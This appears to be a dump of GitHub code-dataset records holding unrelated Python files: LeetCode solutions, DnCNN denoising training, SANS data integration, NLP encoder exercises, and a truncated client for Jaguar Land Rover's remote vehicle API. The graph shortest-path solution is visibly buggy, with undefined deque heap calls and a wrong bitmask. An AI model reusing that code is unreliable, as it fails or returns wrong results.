1)\n\ns = Solution()\nr = s.insert(intervals, newInterval)\nfor i in range(len(r)):\n\tprint(r[i].start, r[i].end)","repo_name":"Rosevil1874/LeetCode-Solution-Python-Java","sub_path":"Python-Solution/57_Insert-Interval/57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"38"} +{"seq_id":"7564592868","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Write a Python Program to get the third side of right angled triangle from two given sides?\n\n# In[1]:\n\n\nfrom math import sqrt\n\n\n# In[ ]:\n\n\nprint('Enter length of two given sides')\na=float(input('Enter a :'))\nb=float(input('Enter b :'))\nc=sqrt(a**2 + b**2)\nprint('The length of third side',c)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"RohitDhuriya/Internship","sub_path":"Python worksheet 1 Q no.14 (1).py","file_name":"Python worksheet 1 Q no.14 (1).py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22046323536","text":"import os\nimport argparse\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as utils\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom models import DnCNN\nfrom dataset import prepare_data, Dataset\nfrom utils import *\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n# 参数管理\nparser = argparse.ArgumentParser(description=\"DnCNN\")\nparser.add_argument(\"--preprocess\", type=bool, default=False, help='run prepare_data or not')\nparser.add_argument(\"--batchSize\", type=int, default=64, help=\"Training batch size\")\nparser.add_argument(\"--num_of_layers\", type=int, default=17, help=\"Number of total layers\")\nparser.add_argument(\"--epochs\", type=int, default=50, help=\"Number of training epochs\")\nparser.add_argument(\"--milestone\", type=int, default=30, help=\"When to decay learning rate; should be less than epochs\")\nparser.add_argument(\"--lr\", type=float, default=1e-3, help=\"Initial learning rate\")\nparser.add_argument(\"--outf\", type=str, default=\"train_logs\", help='path of log files')\nparser.add_argument(\"--logdir\", type=str, default=\"test_logs\", help='path of log files')\nparser.add_argument(\"--noiseL\", type=float, default=25, help='noise level')\nparser.add_argument(\"--val_noiseL\", type=float, default=25, help='noise level used on validation set')\nopt = parser.parse_args()\n\n\ndef main():\n # Load dataset\n print('Loading dataset ...\\n')\n dataset_train = Dataset(train=True)\n dataset_val = Dataset(train=False)\n loader_train = DataLoader(dataset=dataset_train, num_workers=4, batch_size=opt.batchSize, shuffle=True)\n print(\"# of training samples: %d\\n\" % int(len(dataset_train)))\n # Build model\n net = DnCNN(channels=1, num_of_layers=opt.num_of_layers) # 实例化网络,通道数为1(针对灰度图像)\n net.apply(weights_init_kaiming) # 权重初始化\n criterion = nn.MSELoss(reduction='sum') # loss标准为L2均方和\n # Move to GPU\n device_ids = [0]\n model = nn.DataParallel(net, device_ids=device_ids).cuda()\n criterion.cuda()\n # Optimizer\n optimizer = optim.Adam(model.parameters(), lr=opt.lr) # 使用Adam优化算法\n # training\n writer = SummaryWriter(opt.outf) # 记录训练logs\n step = 0\n for epoch in range(opt.epochs):\n if epoch < opt.milestone:\n current_lr = opt.lr\n else: # 当周期数超过milestone,衰减学习率,防止过拟合\n current_lr = opt.lr / 10.\n # set learning rate\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = current_lr\n print('learning rate %f' % current_lr)\n # train\n for i, data in enumerate(loader_train, 0):\n # training step\n model.train() # 训练模式,确保BN参数在训练过程中更新\n model.zero_grad() # 初始化模型梯度\n optimizer.zero_grad() # 初始化优化器梯度\n img_train = data\n noise = torch.FloatTensor(img_train.size()).normal_(mean=0, std=opt.noiseL / 255.) # 生成加性白噪声\n imgn_train = img_train + noise # 生成噪声图像\n img_train, imgn_train = Variable(img_train.cuda()), Variable(imgn_train.cuda()) # 激活GPU计算\n noise = Variable(noise.cuda())\n out_train = model(imgn_train) # 应用模型\n loss = criterion(out_train, noise) / (imgn_train.size()[0] * 2) # 计算loss\n loss.backward() # 反向传播\n optimizer.step() # 更新网络参数\n # results\n model.eval() # 测试模式,确保BN参数在训练过程中不变\n out_train = torch.clamp(imgn_train - model(imgn_train), 0., 1.) # 归一化\n psnr_train = batch_PSNR(out_train, img_train, 1.) # 计算信噪比\n print(\"[epoch %d][%d/%d] loss: %.4f PSNR_train: %.4f\" %\n (epoch + 1, i + 1, len(loader_train), loss.item(), psnr_train))\n if step % 10 == 0:\n # Log the scalar values\n writer.add_scalar('loss', loss.item(), step)\n writer.add_scalar('PSNR on training data', psnr_train, step)\n step += 1\n ## the end of each epoch\n model.eval()\n # validate\n psnr_val = 0 # 平均信噪比\n for k in range(len(dataset_val)):\n img_val = torch.unsqueeze(dataset_val[k], 0) # 增加维度\n noise = torch.FloatTensor(img_val.size()).normal_(mean=0, std=opt.val_noiseL / 255.)\n imgn_val = img_val + noise # 生成加性白噪声图像\n with torch.no_grad(): # 节省显存\n img_val, imgn_val = Variable(img_val.cuda()), Variable(imgn_val.cuda())\n out_val = torch.clamp(imgn_val - model(imgn_val), 0., 1.)\n psnr_val += batch_PSNR(out_val, img_val, 1.)\n psnr_val /= len(dataset_val) # 计算平均信噪比\n print(\"\\n[epoch %d] PSNR_val: %.4f\" % (epoch + 1, psnr_val))\n writer.add_scalar('PSNR on validation data', psnr_val, epoch + 1)\n # log the images\n out_train = torch.clamp(imgn_train - model(imgn_train), 0., 1.)\n Img = utils.make_grid(img_train.data, nrow=8, normalize=True, scale_each=True) # 原图像网格\n Imgn = utils.make_grid(imgn_train.data, nrow=8, normalize=True, scale_each=True) # 噪声图像网格\n Irecon = utils.make_grid(out_train.data, nrow=8, normalize=True, scale_each=True) # 降噪图像网格\n writer.add_image('clean image', Img, epoch)\n writer.add_image('noisy image', Imgn, epoch)\n writer.add_image('reconstructed image', Irecon, epoch)\n # save model\n torch.save(model.state_dict(), os.path.join(opt.outf, 'net.pth'))\n torch.save(model.state_dict(), os.path.join(opt.logdir, 'net.pth'))\n\n\nif __name__ == \"__main__\":\n if opt.preprocess: # 如需要,进行数据集预处理\n prepare_data(data_path='data', patch_size=40, stride=10, aug_times=1)\n main()\n","repo_name":"joeyscave/cv","sub_path":"lab 2 : Image Denosing/lab2 : Image DeNoising/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27305195591","text":"from tkinter import Tk\n\nfrom app.ui.application_ui import ApplicationUi\n\n\ndef start_app():\n root = Tk()\n root.minsize(width=800, height=600)\n app = ApplicationUi(root)\n root.mainloop()\n\n\nif __name__ == '__main__':\n start_app()\n","repo_name":"oallaire/assembly-pdf-generator","sub_path":"app/app_main.py","file_name":"app_main.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70130360750","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 27 21:47:30 2023\n\n@author: lutzbueno_v\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom utils import load_hdf\nimport re\nimport plot_integration as plot_integ\nfrom utils import create_analysis_folder\nfrom utils import save_results\nfrom correction import prepare_corrections\nfrom correction import load_standards\nfrom correction import load_and_normalize\nfrom correction import correct_dark\nfrom correction import correct_EC\nfrom calibration import absolute_calibration\n\n\ndef set_integration(config, result):\n # find all files in the folder\n path_dir_an = create_analysis_folder(config)\n list_dir = list(os.listdir(path_dir_an))\n force_reintegrate = config['analysis']['force_reintegrate']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n for folder_name in list_dir:\n if folder_name[0:3] == 'det':\n det = folder_name[4:]\n path_det = os.path.join(path_dir_an, str(folder_name))\n # create poni and masks\n path_rad_int = os.path.join(path_det, 'integration/')\n if not os.path.exists(path_rad_int):\n os.mkdir(path_rad_int)\n # name the sample\n path = path_rad_int\n prefix = 'radial_integ'\n class_file = result['overview']['det_files_' + det]\n scanNr = class_file['scan'][-1]\n sample_name = class_file['sample_name'][-1]\n frame = 0\n sufix = 'dat'\n last_file = make_file_name(path, prefix, sufix, sample_name, det, scanNr, frame)\n # check if we want to integrate\n if os.path.exists(last_file) and force_reintegrate == 0:\n print('All files are already integrated at ' + det + 'm')\n else:\n prepare_corrections(config, result, det)\n if perform_abs_calib == 1:\n result = load_standards(config, result, det)\n result = integrate(config, result, det, path_rad_int)\n return result\n\ndef make_file_name(path, prefix, sufix, sample_name, det, scanNr, frame):\n file_n = path + prefix + '_' + f\"{scanNr:07d}\" + '_'+ f\"{frame:05d}_\" + sample_name + '_' +'det' + det + 'm'+ '.' + sufix\n return file_n\n\ndef integrate(config, result, det, path_rad_int):\n plt.ioff()\n path_hdf_raw = config['analysis']['path_hdf_raw']\n class_file = result['overview']['det_files_'+ det]\n # correct to absolute scale\n perform_abs_calib = config['analysis']['perform_abs_calib']\n perform_azimuthal = config['analysis']['perform_azimuthal']\n perform_radial = config['analysis']['perform_radial']\n class_file = result['overview']['det_files_'+ det]\n\n # pixel range defines how many q the final curve will contain\n pixel_range = range(0, 100)\n result['integration']['pixel_range'] = pixel_range\n # execute the corrections for all\n print('DOING ' + str(det) + 'm')\n for ii in range(0, len(class_file['sample_name'])):\n name_hdf = class_file['name_hdf'][ii]\n sample_name = class_file['sample_name'][ii]\n scanNr = class_file['scan'][ii]\n # do radial integration for each frame\n for ff in range(0, class_file['frame_nr'][ii]):\n if perform_abs_calib == 1:\n dark = result['integration']['cadmium']\n img = load_and_normalize(config, result, name_hdf)\n # Subtract empty cell and Cadmium\n img_cell = result['integration']['empty_cell']\n # subraction of empty cell\n if class_file['frame_nr'][ii] > 1:\n img1 = correct_dark(img[ff,:,:], dark)\n img1 = correct_EC(img1, img_cell)\n else:\n img1 = correct_dark(img, dark)\n img1 = correct_EC(img1, img_cell)\n print('Corrected scan ' + class_file['name_hdf'][ii] + ', Frame: ' + str(ff) )\n else:\n img = load_hdf(path_hdf_raw, name_hdf, 'counts')\n if class_file['frame_nr'][ii] > 1:\n img1 = img[ff,:,:]\n else:\n img1=img\n print('NOT corrected scan ' + class_file['name_hdf'][ii] + ', Frame: ' + str(ff) )\n img1= np.squeeze(img1)\n # get the frame number\n frame = ff\n # azimuthal integration\n if perform_radial == 1:\n # name the sample\n prefix = 'pattern2D'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n np.savetxt(file_name, img1, delimiter=',')\n # name the sample\n prefix = 'radial_integ'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n radial_integ(config, result, img1, file_name)\n if perform_azimuthal == 1:\n # name the sample\n prefix = 'azim_integ'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n azimuthal_integ(config, result, img1, file_name)\n plot_radial_integ(config, result, file_name)\n return result\n\n\ndef radial_integ(config, result, img1, file_name):\n ai = result['integration']['ai']\n mask = result['integration']['int_mask']\n pixel_range = result['integration']['pixel_range']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n # integrate for radial plots\n q, I, sigma = ai.integrate1d(img1, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model=\"azimuthal\",\n flat = None,\n dark = None)\n if perform_abs_calib == 1:\n # correct for the number of pixels\n flat = flat = result['integration']['water']\n q_flat, I_flat, sigma_flat = ai.integrate1d(flat, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model=\"azimuthal\",\n flat = None,\n dark = None)\n I, sigma = absolute_calibration(config, result, file_name, I, sigma, I_flat)\n # save the integrated files\n data_save = np.column_stack((q, I, sigma))\n header_text = 'q (A-1), absolute intensity I (1/cm), standard deviation'\n np.savetxt(file_name, data_save, delimiter=',' , header = header_text)\n # save result\n path_dir_an = create_analysis_folder(config)\n save_results(path_dir_an, result)\n\n\ndef azimuthal_integ(config, result, img1, file_name):\n ai = result['integration']['ai']\n mask = result['integration']['int_mask']\n pixel_range = result['integration']['pixel_range']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n # define the number of sectors\n sectors_nr = 16\n # integrate for azimuthal plots\n npt_azim = range(0, 370, int(360/sectors_nr))\n result['integration']['sectors_nr'] = sectors_nr\n result['integration']['npt_azim'] = npt_azim\n for rr in range(0, len(npt_azim)-1):\n azim_start = npt_azim[rr]\n azim_end = npt_azim[rr+1]\n q, I, sigma = ai.integrate1d(img1, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model = \"azimuthal\",\n azimuth_range = [azim_start, azim_end],\n flat = None,\n dark = None)\n if perform_abs_calib == 1:\n # correct for the number of pixels\n flat = result['integration']['water']\n q_flat, I_flat, sigma_flat = ai.integrate1d(flat, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model = \"azimuthal\",\n azimuth_range = [azim_start, azim_end],\n flat = None,\n dark = None)\n I, sigma = absolute_calibration(config, result, file_name, I, sigma, I_flat)\n if rr == 0:\n I_all = I\n sigma_all = sigma\n else:\n I_all = np.column_stack((I_all,I))\n sigma_all = np.column_stack((sigma_all, sigma))\n #save the integrated data\n data_save = np.column_stack((q, I_all, sigma_all))\n header_text = 'q (A-1), ' + str(sectors_nr) + ' columns for absolute intensity I (1/cm), '+ str(sectors_nr) + ' columns for standard deviation'\n np.savetxt(file_name, data_save, delimiter=',' , header = header_text)\n # save result\n path_dir_an = create_analysis_folder(config)\n save_results(path_dir_an, result)\n\ndef plot_radial_integ(config, result, file_name):\n # plot and save the results\n if config['analysis']['plot_azimuthal'] ==1:\n ScanNr = int(re.findall(r\"\\D(\\d{7})\\D\", file_name)[0])\n Frame = int(re.findall(r\"\\D(\\d{5})\\D\", file_name)[0])\n plot_integ.plot_integ_azimuthal(config, result, ScanNr, Frame)\n\n if config['analysis']['plot_radial'] ==1:\n ScanNr = int(re.findall(r\"\\D(\\d{7})\\D\", file_name)[0])\n Frame = int(re.findall(r\"\\D(\\d{5})\\D\", file_name)[0])\n plot_integ.plot_integ_radial(config, result, ScanNr, Frame)\n","repo_name":"vivianel/DarePy-SANS","sub_path":"codes/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":10616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32070649049","text":"from typing import List\n\n\nclass Solution:\n \"\"\"\n You have an undirected, connected graph of n nodes labeled from 0 to n - 1. You are given an array graph where graph[i] is a list of all the nodes connected with node i by an edge.\n\n Return the length of the shortest path that visits every node. You may start and stop at any node, you may revisit nodes multiple times, and you may reuse edges.\n\n Example 1:\n\n Input: graph = [[1,2,3],[0],[0],[0]]\n Output: 4\n Explanation: One possible path is [1,0,2,0,3]\n Example 2:\n\n Input: graph = [[1],[0,2,4],[1,3,4],[2],[1,2]]\n Output: 4\n Explanation: One possible path is [0,1,4,2,3]\n \"\"\"\n def shortestPathLength1(self, graph: List[List[int]]) -> int:\n n = len(graph)\n if n == 1:\n return 0\n que = []\n visited = set()\n for node, _ in enumerate(graph):\n state = 1 << node\n que.append((0, node, state))\n visited.add((node, state))\n target = (1 << n) - 1\n\n while que:\n dis, node, state = deque.heappop(que)\n for nei in graph[node]:\n nei_state = 1 << nei | state\n if nei_state == target:\n return dis + 1\n if (nei, nei_state) in visited:\n continue\n deque.heappush(que, (dis + 1, nei, nei_state))\n visited.add((nei, nei_state))\n \n def shortestPathLength(self, graph: List[List[int]]) -> int:\n n = len(graph)\n final_mask = (1 << n) - 1\n\n que = deque([[i, 1 << i, 0] for i in range(n)])\n visited = set((i, i << i) for i in range(n))\n while que:\n node, mask, steps = que.popleft()\n if mask == final_mask:\n return steps\n for neighbor in graph[node]:\n new_mask = mask | (1 << neighbor)\n if (neighbor, new_mask) not in visited:\n visited.add((neighbor, new_mask))\n que.append([neighbor, new_mask, steps + 1])\n return -1\n\n","repo_name":"benbendaisy/CommunicationCodes","sub_path":"python_module/examples/847_Shortest_Path_Visiting_All_Nodes.py","file_name":"847_Shortest_Path_Visiting_All_Nodes.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21595466156","text":"import tensorflow as tf\nfrom model.module import transformer\n\n\n# prac 1\nclass CNNBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(CNNBasedEncoder, self).__init__()\n self.cnn_layers = []\n for i in range(args.encoder_n_layer):\n self.cnn_layers.append(\n tf.keras.layers.Conv1D(args.dim_embedding, args.cnn_kernel_size, padding='same', activation='relu'\n , name='cnn_layer_{}'.format(str(i)))\n )\n\n def call(self, inputs):\n out = inputs\n\n for cnn_layer in self.cnn_layers:\n out = cnn_layer(out)\n\n return out\n\n\n# prac 1\nclass LSTMBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(LSTMBasedEncoder, self).__init__()\n self.lstm_layers = []\n for i in range(args.encoder_n_layer):\n self.lstm_layers.append(\n tf.keras.layers.LSTM(args.dim_embedding, return_sequences=True, name='lstm_layer_{}'.format(str(i)))\n )\n\n def call(self, inputs):\n out = inputs\n\n for lstm_layer in self.lstm_layers:\n out = lstm_layer(out)\n\n return out\n\n\n# prac_1\n# Bidirectional : https://www.tensorflow.org/api_docs/python/tf/keras/layers/Bidirectional\nclass BiLSTMBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(BiLSTMBasedEncoder, self).__init__()\n self.lstm_layers = []\n for i in range(args.encoder_n_layer):\n # 빈칸 작성\n print('빈칸 작성')\n\n def call(self, inputs):\n out = inputs\n\n for lstm_layer in self.lstm_layers:\n out = lstm_layer(out)\n\n return out\n\n\nclass TransformerBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(TransformerBasedEncoder, self).__init__()\n self.transformer_layers = []\n for i in range(args.encoder_n_layer):\n self.transformer_layers.append(\n transformer.TransformerEncoderLayer(embed_dim=args.dim_embedding,\n num_heads=args.encoder_n_head,\n ff_dim=args.dim_embedding)\n )\n\n def call(self, inputs):\n x = inputs\n x_q, x_k, x_v = x, x, x\n\n for transformer_layer in self.transformer_layers:\n x_q = transformer_layer(x_q, x_k, x_v)\n x_k = x_q\n x_v = x_q\n\n return x_q\n","repo_name":"jhlee17139/TFNLP_prac","sub_path":"model/module/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"16392554170","text":"\"\"\" Simple Python class to access the JLR Remote Car API\nhttps://github.com/ardevd/jlrpy\n\"\"\"\n\nfrom urllib.request import Request, build_opener\n\nimport json\nimport datetime\nimport calendar\nimport uuid\nimport sys\nimport logging\n\nlogger = logging.getLogger('jply')\nlogger.setLevel(logging.INFO)\n\nch = logging.StreamHandler(sys.stdout)\nch.setFormatter(logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\"))\nlogger.addHandler(ch)\nlogger.propagate = False\n\nIFAS_BASE_URL = \"https://ifas.prod-row.jlrmotor.com/ifas/jlr\"\nIFOP_BASE_ULR = \"https://ifop.prod-row.jlrmotor.com/ifop/jlr\"\nIF9_BASE_URL = \"https://if9.prod-row.jlrmotor.com/if9/jlr\"\n\n\nclass Connection(object):\n \"\"\"Connection to the JLR Remote Car API\"\"\"\n\n def __init__(self,\n email='',\n password='',\n device_id='',\n refresh_token=''):\n \"\"\"Init the connection object\n\n The email address and password associated with your Jaguar InControl account is required.\n A device Id can optionally be specified. If not one will be generated at runtime.\n A refresh token can be supplied for authentication instead of a password\n \"\"\"\n self.email = email\n\n if device_id:\n self.device_id = device_id\n else:\n self.device_id = str(uuid.uuid4())\n\n if refresh_token:\n self.oauth = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token}\n else:\n self.oauth = {\n \"grant_type\": \"password\",\n \"username\": email,\n \"password\": password}\n\n self.expiration = 0 # force credential refresh\n\n self.connect()\n\n self.vehicles = []\n try:\n for v in self.get_vehicles(self.head)['vehicles']:\n self.vehicles.append(Vehicle(v, self))\n except TypeError:\n logger.error(\"No vehicles associated with this account\")\n\n def get(self, command, url, headers):\n \"\"\"GET data from API\"\"\"\n return self.post(command, url, headers, None)\n\n def post(self, command, url, headers, data=None):\n \"\"\"POST data to API\"\"\"\n now = calendar.timegm(datetime.datetime.now().timetuple())\n logger.debug(url)\n if now > self.expiration:\n # Auth expired, reconnect\n self.connect()\n return self.__open(\"%s/%s\" % (url, command), headers=headers, data=data)\n\n def connect(self):\n logger.info(\"Connecting...\")\n auth = self.__authenticate(data=self.oauth)\n self.__register_auth(auth)\n self.__set_header(auth['access_token'])\n logger.info(\"[+] authenticated\")\n self.__register_device_and_log_in()\n\n def __register_device_and_log_in(self):\n self.__register_device(self.head)\n logger.info(\"1/2 device id registered\")\n self.__login_user(self.head)\n logger.info(\"2/2 user logged in, user id retrieved\")\n\n def __open(self, url, headers=None, data=None):\n req = Request(url, headers=headers)\n if data:\n req.data = bytes(json.dumps(data), encoding=\"utf8\")\n\n opener = build_opener()\n resp = opener.open(req)\n charset = resp.info().get('charset', 'utf-8')\n resp_data = resp.read().decode(charset)\n if resp_data:\n return json.loads(resp_data)\n else:\n return None\n\n def __register_auth(self, auth):\n self.access_token = auth['access_token']\n now = calendar.timegm(datetime.datetime.now().timetuple())\n self.expiration = now + int(auth['expires_in'])\n self.auth_token = auth['authorization_token']\n self.refresh_token = auth['refresh_token']\n\n def __set_header(self, access_token):\n \"\"\"Set HTTP header fields\"\"\"\n self.head = {\n \"Authorization\": \"Bearer %s\" % access_token,\n \"X-Device-Id\": self.device_id,\n \"Content-Type\": \"application/json\"}\n\n def __authenticate(self, data=None):\n \"\"\"Raw urlopen command to the auth url\"\"\"\n url = \"%s/tokens\" % IFAS_BASE_URL\n auth_headers = {\n \"Authorization\": \"Basic YXM6YXNwYXNz\",\n \"Content-Type\": \"application/json\",\n \"X-Device-Id\": self.device_id}\n\n return self.__open(url, auth_headers, data)\n\n def __register_device(self, headers=None):\n \"\"\"Register the device Id\"\"\"\n url = \"%s/users/%s/clients\" % (IFOP_BASE_ULR, self.email)\n data = {\n \"access_token\": self.access_token,\n \"authorization_token\": self.auth_token,\n \"expires_in\": \"86400\",\n \"deviceID\": self.device_id\n }\n\n return self.__open(url, headers, data)\n\n def __login_user(self, headers=None):\n \"\"\"Login the user\"\"\"\n url = \"%s/users?loginName=%s\" % (IF9_BASE_URL, self.email)\n user_login_header = headers.copy()\n user_login_header[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.User-v3+json\"\n\n user_data = self.__open(url, user_login_header)\n self.user_id = user_data['userId']\n return user_data\n\n def refresh_tokens(self):\n \"\"\"Refresh tokens.\"\"\"\n self.oauth = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": self.refresh_token}\n\n auth = self.__authenticate(self.oauth)\n self.__register_auth(auth)\n self.__set_header(auth['access_token'])\n logger.info(\"[+] Tokens refreshed\")\n self.__register_device_and_log_in()\n\n def get_vehicles(self, headers):\n \"\"\"Get vehicles for user\"\"\"\n url = \"%s/users/%s/vehicles?primaryOnly=true\" % (IF9_BASE_URL, self.user_id)\n return self.__open(url, headers)\n\n def get_user_info(self):\n \"\"\"Get user information\"\"\"\n return self.get(self.user_id, \"%s/users\" % IF9_BASE_URL, self.head)\n\n def update_user_info(self, user_info_data):\n \"\"\"Update user information\"\"\"\n headers = self.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.User-v3+json; charset=utf-8\"\n return self.post(self.user_id, \"%s/users\" % IF9_BASE_URL, headers, user_info_data)\n\n def reverse_geocode(self, lat, lon):\n \"\"\"Get geocode information\"\"\"\n return self.get(\"en\",\n \"%s/geocode/reverse/{0:f}/{1:f}\".format(lat, lon) % IF9_BASE_URL,\n self.head)\n\n\nclass Vehicle(dict):\n \"\"\"Vehicle class.\n\n You can request data or send commands to vehicle. Consult the JLR API documentation for details\n \"\"\"\n\n def __init__(self, data, connection):\n \"\"\"Initialize the vehicle class.\"\"\"\n\n super().__init__(data)\n self.connection = connection\n self.vin = data['vin']\n\n def get_attributes(self):\n \"\"\"Get vehicle attributes\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.VehicleAttributes-v3+json\"\n result = self.get('attributes', headers)\n return result\n\n def get_status(self, key=None):\n \"\"\"Get vehicle status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.if9.healthstatus-v2+json\"\n result = self.get('status', headers)\n\n if key:\n return {d['key']: d['value'] for d in result['vehicleStatus']}[key]\n\n return result\n\n def get_health_status(self):\n \"\"\"Get vehicle health status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n\n vhs_data = self._authenticate_vhs()\n\n return self.post('healthstatus', headers, vhs_data)\n\n def get_departure_timers(self):\n \"\"\"Get vehicle departure timers\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.DepartureTimerSettings-v1+json\"\n return self.get(\"departuretimers\", headers)\n\n def get_wakeup_time(self):\n \"\"\"Get configured wakeup time for vehicle\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.VehicleWakeupTime-v2+json\"\n return self.get(\"wakeuptime\", headers)\n\n def get_subscription_packages(self):\n \"\"\"Get vehicle status\"\"\"\n result = self.get('subscriptionpackages', self.connection.head)\n return result\n\n def get_trips(self, count=1000):\n \"\"\"Get the last 1000 trips associated with vehicle\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.triplist-v2+json\"\n return self.get('trips?count=%d' % count, headers)\n\n def get_trip(self, trip_id):\n \"\"\"Get info on a specific trip\"\"\"\n return self.get('trips/%s/route?pageSize=1000&page=0' % trip_id, self.connection.head)\n\n def get_position(self):\n \"\"\"Get current vehicle position\"\"\"\n return self.get('position', self.connection.head)\n\n def get_service_status(self, service_id):\n \"\"\"Get service status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n return self.get('services/%s' % service_id, headers)\n\n def get_services(self):\n \"\"\"Get active services\"\"\"\n headers = self.connection.head.copy()\n return self.get(\"services\", headers)\n\n def get_rcc_target_value(self):\n \"\"\"Get Remote Climate Target Value\"\"\"\n headers = self.connection.head.copy()\n return self.get('settings/ClimateControlRccTargetTemp', headers)\n\n def set_attributes(self, nickname, registration_number):\n \"\"\"Set vehicle nickname and registration number\"\"\"\n attributes_data = {\"nickname\": nickname,\n \"registrationNumber\": registration_number}\n return self.post(\"attributes\", self.connection.head, attributes_data)\n\n def lock(self, pin):\n \"\"\"Lock vehicle. Requires personal PIN for authentication\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n rdl_data = self.authenticate_rdl(pin)\n\n return self.post(\"lock\", headers, rdl_data)\n\n def unlock(self, pin):\n \"\"\"Unlock vehicle. Requires personal PIN for authentication\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n rdu_data = self.authenticate_rdu(pin)\n\n return self.post(\"unlock\", headers, rdu_data)\n\n def reset_alarm(self, pin):\n \"\"\"Reset vehicle alarm\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n aloff_data = self.authenticate_aloff(pin)\n\n return self.post(\"unlock\", headers, aloff_data)\n\n def honk_blink(self):\n \"\"\"Sound the horn and blink lights\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n\n hblf_data = self.authenticate_hblf()\n return self.post(\"honkBlink\", headers, hblf_data)\n\n def remote_engine_start(self, pin, target_value):\n \"\"\"Start Remote Engine preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n self.set_rcc_target_value(pin, target_value)\n reon_data = self.authenticate_reon(pin)\n\n return self.post(\"engineOn\", headers, reon_data)\n\n def remote_engine_stop(self, pin):\n \"\"\"Stop Remote Engine preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = 